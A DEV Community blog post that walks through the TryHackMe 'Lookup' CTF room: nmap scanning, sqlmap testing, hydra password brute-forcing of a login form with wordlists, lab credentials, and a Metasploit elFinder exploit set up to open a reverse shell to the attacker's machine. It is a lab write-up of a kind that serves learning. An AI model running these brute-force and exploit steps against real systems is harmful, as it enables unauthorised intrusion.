DEV Community

Cover image for Lookup CTF
khelil Cherfi Mohamed Farid
khelil Cherfi Mohamed Farid

Posted on • Edited on

Lookup CTF

#ctf #security #linux #hacking

introduction of the Lookup CTF from try hack me at ( https://tryhackme.com/r/room/lookup )

  1. scaning the ip address by nmap tool in the most simpel comand nmap <IP-ADD>

Image description

  1. we can see that port http 80 and ssh 22 are open so we check the web page on port 80 we notice that the page redirected us to http://lookup.thm/ and you got this :

Image description

dont panic it is simpel we just need to add the host name lookup.thm to the ip address like this
sudo nano /etc/hosts and put this in the file 10.10.213.56 lookup.thm
and the reload the page http://lookup.thm/ and you should get this page :

Image description

  1. we can chek for sql injection possible by running 
sqlmap -u "http://lookup.thm/login.php" --data="username=admin&password=test" --batch
Enter fullscreen mode Exit fullscreen mode

but wwe cant find any thing ther

  1. we try brut forsing the login page

by running the comand

hydra -l admin -P /usr/share/wordlists/rockyou.txt lookup.thm http-post-form "/login.php:username=^USER^&password=^PASS^:wrong password" -V -I -t 64 -f
Enter fullscreen mode Exit fullscreen mode

this comand will stop wen it find somthing
after some time we get

Image description
we found the user neme and it password

login: admin
password: password123

but we notice that the wen we unter the username and he passworld we get that they are wrong so we got to find the right user anme for the password: password123 we got to brut force it by using

hydra -L /usr/share/wordlists/SecLists/Usernames/Names/names.txt -p password123 lookup.thm http-post-form "/login:username=^USER^&password=^PASS^F:Invalid login" -V -I -t 64 -f
Enter fullscreen mode Exit fullscreen mode

and we get the new user name

login: jose
password: password123

but this time wen we use the new login it send us to a new url (http://files.lookup.thm/)
but the page is not loading however we saw before hhhhh fix it n the /etc/hosts/ file we got to add

files.lookup.thm

we gite tat the web sit is running the files on elfinder

Image description

  1. we enter to metasploit msfconsole -q we search what elfinder version are avaliable serche elfinder

Image description
we will run the 4th one to get a revers shell use 4

  • cofiguring the rhost to teh elfinder in the web page

set rhost files.lookup.thm

  • cofiguring the lhost witch is your attackbox ip address

set lhost

  • run it (u can check the optionts by typing options to chek your config )

run

shell

and if you did everything you shuld get a reverse shell like this

Image description

now you can run python3 -c 'import pty; pty.spawn("/bin/bash")'

Top comments (0)

Read next

omobolaji_25 profile image

The Need for Security in Firms:

Favour ogungbade -

nolunchbreaks_22 profile image

Understanding Kubernetes Security: Common Vulnerabilities and Modern Solutions

Osagie Anolu -

wvnuola profile image

Password Managers Explained: The Easiest Way to Stay Secure Online

Wonuola Ogunsanmi -

nikolapopov profile image

Threat Modeling for Non-Security Experts

Nikola Popov -